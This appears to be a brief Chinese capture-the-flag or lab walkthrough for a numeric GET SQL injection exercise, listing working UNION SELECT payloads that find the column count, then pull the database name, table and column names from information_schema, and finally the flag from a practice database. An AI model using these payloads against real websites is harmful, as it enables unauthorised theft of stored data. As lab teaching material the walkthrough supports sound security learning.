1.SQL数字型GET注入01
(1)输入1’报错,输入-1返回正常,构造payload
(2)判断显示位
-1 order by 3#
-1 union select 1,2,3#
(3)爆库:-1 union select 1,database(),3#
(4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’#
(5)爆列:-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘dwvs’ and table_name=‘flag’#
(5)爆数据:-1 union select 1,flag,3 from dwvs.flag#